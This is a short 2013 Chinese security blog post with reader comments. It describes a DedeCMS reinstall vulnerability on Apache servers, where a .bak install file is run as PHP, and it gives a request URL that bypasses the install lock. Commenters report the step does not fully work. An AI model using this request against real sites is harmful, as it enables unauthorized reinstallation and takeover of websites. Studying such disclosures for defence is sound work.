dedecms 躺着也中枪爆重装漏洞

2013-06-30
安全
4 条评论
4.8K次阅读

利用条件：web server: apache
漏洞原因:：apache 不认识bak 直接当php执行.

http://webshell.cc/install/index.php.bak?insLockfile=1

这dedecms死的太冤枉了. apache的原因.

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/4379.html

apache dedecms PHP

已有 4 条评论

小小孩

2013/06/30 17:35

进入第二步就会出现这样：程序已运行安装，如果你确定要重新安装，请先从FTP中删除 install/install_lock.txt！

回复
1. flow
  
  2013/08/14 20:24
  
  @小小孩, 博主给的是思路.
  
  回复
  1. sex
    
    2013/08/14 20:46
    
    @flow, 嗯，不过事实就是进行不下去
    
    回复
    1. flow
      
      2013/08/14 21:04
      
      @sex, 有发现跟牛的洞吗?
      
      回复

添加新评论

上一篇: dedecms最新版本修改任意管理员漏洞附getshell exp
下一篇: 刚刚捞到的提权0DAY,亲测2K3成功.